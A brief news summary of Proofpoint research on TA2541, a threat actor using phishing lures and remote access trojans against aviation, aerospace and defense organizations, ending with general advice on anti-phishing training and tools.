"Researchers Discover Common Threat Actor TA2541 Behind Aviation and Defense Malware Campaigns"
Security researchers at Proofpoint discovered a common threat actor behind attacks reported by Microsoft, Cisco Talos, and more. The individual or group, dubbed TA2541, has been attacking targets in the aviation, aerospace, transportation, and defense industries with Remote Access Trojans (RATs) since 2017. Its malware campaigns have impacted organizations globally, with recurring targets being in North America, Europe, and the Middle East. In addition to COVID-19-themed phishing emails, TA2541 has used emails requesting quotes for aeronautical parts, ambulatory flights, and other specific components in the course of targeting organizations. In past campaigns, TA2541 used files containing malicious scripts that download malware, but its more recent campaigns have been using a Google Drive URL that takes the victim to an obfuscated Visual Basic Script (VBS) file. Once the VBS file is executed, PowerShell pulls an executable from a text file hosted on sites such as Pastebin. The executable then uses PowerShell to get into Windows processes, collects information, attempts to disable security software, and then downloads the RAT. TA2541 has also been observed using Discord URLs that link to compressed files, which download either AgentTesla or Imminent Monitor. TA2541's techniques require human error, like other malicious campaigns involving phishing attacks. Therefore, it is essential to train people on how to recognize suspicious emails and messages, as well as to implement proper anti-phishing security tools. This article continues to discuss the tactics, techniques, procedures, and targets of TA2541, and how to avoid falling victim to its campaigns.